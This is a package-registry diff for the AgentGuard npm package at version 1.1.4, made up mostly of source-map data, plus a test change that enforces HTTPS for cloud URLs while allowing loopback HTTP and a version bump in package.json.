,QAAQ,EAAE,CAAC,EAAE,WAAW,EAAE,GAAG,EAAE,CAAC,EAAE,CAAC,EAClD,EAAE,UAAU,EAAE,CAAC,6BAA6B,CAAC,EAAE,CAChD,CAAC;QACF,gBAAM,CAAC,KAAK,CAAC,MAAM,CAAC,gBAAgB,CAAC,MAAM,EAAE,CAAC,CAAC,CAAC;QAChD,gBAAM,CAAC,SAAS,CAAC,MAAM,CAAC,QAAQ,EAAE,EAAE,CAAC,CAAC;IACxC,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,oEAAoE,EAAE,KAAK,IAAI,EAAE;QAClF,MAAM,IAAI,GAAG,IAAA,qBAAW,EAAC,IAAA,gBAAI,EAAC,IAAA,gBAAM,GAAE,EAAE,eAAe,CAAC,CAAC,CAAC;QAC1D,MAAM,IAAI,GAAG,4CAA4C,CAAC;QAC1D,YAAY,CAAC,IAAI,EAAE,QAAQ,EAAE,IAAI,CAAC,CAAC;QACnC,MAAM,QAAQ,GAAG,IAAA,wBAAU,EAAC,QAAQ,CAAC,CAAC,MAAM,CAAC,IAAI,CAAC,CAAC,MAAM,CAAC,KAAK,CAAC,CAAC;QACjE,MAAM,MAAM,GAAG,MAAM,IAAA,sCAAuB,EAC1C,YAAY,CAAC,EAAE,QAAQ,EAAE,CAAC,EAAE,MAAM,EAAE,QAAQ,EAAE,CAAC,EAAE,CAAC,EAClD,EAAE,UAAU,EAAE,CAAC,IAAI,CAAC,EAAE,CACvB,CAAC;QACF,gBAAM,CAAC,KAAK,CAAC,MAAM,CAAC,gBAAgB,CAAC,MAAM,EAAE,CAAC,CAAC,CAAC;QAChD,gBAAM,CAAC,KAAK,CAAC,MAAM,CAAC,gBAAgB,CAAC,CAAC,CAAC,CAAC,SAAS,EAAE,QAAQ,CAAC,CAAC;QAC7D,gBAAM,CAAC,KAAK,CAAC,MAAM,CAAC,gBAAgB,CAAC,CAAC,CAAC,CAAC,IAAI,EAAE,QAAQ,CAAC,CAAC;IAC1D,CAAC,CAAC,CAAC;AACL,CAAC,CAAC,CAAC;AAEH,IAAA,oBAAQ,EAAC,eAAe,EAAE,GAAG,EAAE;IAC7B,IAAA,cAAE,EAAC,0BAA0B,EAAE,GAAG,EAAE;QAClC,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,aAAa,EAAE,6BAA6B,CAAC,EAAE,IAAI,CAAC,CAAC;QAChF,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,aAAa,EAAE,eAAe,CAAC,EAAE,KAAK,CAAC,CAAC;IACrE,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,qCAAqC,EAAE,GAAG,EAAE;QAC7C,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,EAAE,EAAE,UAAU,CAAC,EAAE,KAAK,CAAC,CAAC;QACnD,sDAAsD;QACtD,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,IAAI,EAAE,UAAU,CAAC,EAAE,KAAK,CAAC,CAAC;IACvD,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,4BAA4B,EAAE,GAAG,EAAE;QACpC,MAAM,IAAI,GAAG,GAAG,GAAG,GAAG,CAAC,MAAM,CAAC,GAAG,CAAC,GAAG,GAAG,CAAC;QACzC,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,IAAI,EAAE,MAAM,CAAC,EAAE,KAAK,CAAC,CAAC;IACnD,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,yDAAyD,EAAE,GAAG,EAAE;QACjE,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,OAAO,EAAE,MAAM,CAAC,EAAE,KAAK,CAAC,CAAC;QACpD,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,OAAO,EAAE,MAAM,CAAC,EAAE,KAAK,CAAC,CAAC;QACpD,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,OAAO,EAAE,MAAM,CAAC,EAAE,KAAK,CAAC,CAAC;IACtD,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,kCAAkC,EAAE,GAAG,EAAE;QAC1C,gBAAM,CAAC,KAAK,CAAC,IAAA,4BAAa,EAAC,WAAW,EAAE,MAAM,CAAC,EAAE,KAAK,CAAC,CAAC;IAC1D,CAAC,CAAC,CAAC;AACL,CAAC,CAAC,CAAC"}
|
|
@@ -29,14 +29,18 @@ const client_js_1 = require("../cloud/client.js");
|
|
|
29
29
|
process.env.AGENTGUARD_HOME = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'agentguard-config-'));
|
|
30
30
|
try {
|
|
31
31
|
strict_1.default.throws(() => (0, config_js_1.connectCloud)({ apiKey: 'not-a-key', cloudUrl: 'https://agentguard.example' }), /Invalid AgentGuard API key format/);
|
|
32
|
-
|
|
32
|
+
// Loopback http:// is now allowed (needed for local dev + tests). Test
|
|
33
|
+
// the rejection on a non-loopback http URL instead.
|
|
34
|
+
strict_1.default.throws(() => (0, config_js_1.connectCloud)({ apiKey: 'ag_live_test_key_123456', cloudUrl: 'http://agentguard.example' }), /must use https/);
|
|
33
35
|
const config = (0, config_js_1.connectCloud)({
|
|
34
36
|
apiKey: 'ag_live_test_key_123456',
|
|
35
37
|
cloudUrl: 'https://agentguard.example',
|
|
36
38
|
});
|
|
37
39
|
strict_1.default.equal(config.cloudUrl, 'https://agentguard.example');
|
|
38
40
|
strict_1.default.equal((0, node_fs_1.statSync)((0, config_js_1.getAgentGuardPaths)().configPath).mode & 0o777, 0o600);
|
|
39
|
-
strict_1.default.throws(() => new client_js_1.AgentGuardCloudClient({ cloudUrl: 'http://
|
|
41
|
+
strict_1.default.throws(() => new client_js_1.AgentGuardCloudClient({ cloudUrl: 'http://agentguard.example', apiKey: 'ag_live_test_key_123456' }), /must use https/);
|
|
42
|
+
// Loopback http:// should construct fine — confirms the new exception.
|
|
43
|
+
strict_1.default.doesNotThrow(() => new client_js_1.AgentGuardCloudClient({ cloudUrl: 'http://127.0.0.1:9', apiKey: 'ag_live_test_key_123456' }));
|
|
40
44
|
}
|
|
41
45
|
finally {
|
|
42
46
|
if (previousHome === undefined)
|
|
@@ -1 +1 @@
|
|
|
1
|
-
{"version":3,"file":"runtime-cloud.test.js","sourceRoot":"","sources":["../../src/tests/runtime-cloud.test.ts"],"names":[],"mappings":";;;;;AAAA,yCAAyC;AACzC,gEAAwC;AACxC,qCAA6E;AAC7E,yCAAiC;AACjC,qCAAiC;AACjC,0DAA8D;AAC9D,oDAAwE;AACxE,0DAAqD;AACrD,kDAAkE;AAClE,sDAAsD;AACtD,4CAAgE;AAChE,kDAA2D;AAI3D,IAAA,oBAAQ,EAAC,sBAAsB,EAAE,GAAG,EAAE;IACpC,IAAA,cAAE,EAAC,gEAAgE,EAAE,GAAG,EAAE;QACxE,MAAM,UAAU,GAAG,gEAAgE,CAAC;QACpF,MAAM,QAAQ,GAAG,IAAA,yBAAU,EACzB,iGAAiG,UAAU,EAAE,CAC9G,CAAC;QAEF,gBAAM,CAAC,EAAE,CAAC,QAAQ,CAAC,QAAQ,CAAC,YAAY,CAAC,CAAC,CAAC;QAC3C,gBAAM,CAAC,EAAE,CAAC,CAAC,QAAQ,CAAC,QAAQ,CAAC,sBAAsB,CAAC,CAAC,CAAC;QACtD,gBAAM,CAAC,EAAE,CAAC,CAAC,QAAQ,CAAC,QAAQ,CAAC,cAAc,CAAC,CAAC,CAAC;QAC9C,gBAAM,CAAC,EAAE,CAAC,CAAC,QAAQ,CAAC,QAAQ,CAAC,QAAQ,CAAC,CAAC,CAAC;IAC1C,CAAC,CAAC,CAAC;IAEH,IAAA,cAAE,EAAC,iDAAiD,EAAE,GAAG,EAAE;QACzD,MAAM,YAAY,GAAG,OAAO,CAAC,GAAG,CAAC,eAAe,CAAC;QACjD,OAAO,CAAC,GAAG,CAAC,eAAe,GAAG,IAAA,qBAAW,EAAC,IAAA,gBAAI,EAAC,IAAA,gBAAM,GAAE,EAAE,oBAAoB,CAAC,CAAC,CAAC;QAChF,IAAI,CAAC;YACH,gBAAM,CAAC,MAAM,CACX,GAAG,EAAE,CAAC,IAAA,wBAAY,EAAC,EAAE,MAAM,EAAE,WAAW,EAAE,QAAQ,EAAE,4BAA4B,EAAE,CAAC,EACnF,mCAAmC,CACpC,CAAC;YACF,gBAAM,CAAC,MAAM,CACX,GAAG,EAAE,CAAC,IAAA,wBAAY,EAAC,EAAE,MAAM,EAAE,yBAAyB,EAAE,QAAQ,EAAE,
|
|
1
|
+
{"version":3,"file":"runtime-cloud.test.js","sourceRoot":"","sources":["../../src/tests/runtime-cloud.test.ts"],"names":[],"mappings":"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"}
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@goplus/agentguard",
|
|
3
|
-
"version": "1.1.
|
|
3
|
+
"version": "1.1.4",
|
|
4
4
|
"description": "GoPlus AgentGuard — Security guard for AI agents. Blocks dangerous commands, prevents data leaks, protects secrets. 20 detection rules, runtime action evaluation, trust registry.",
|
|
5
5
|
"main": "dist/index.js",
|
|
6
6
|
"types": "dist/index.d.ts",
|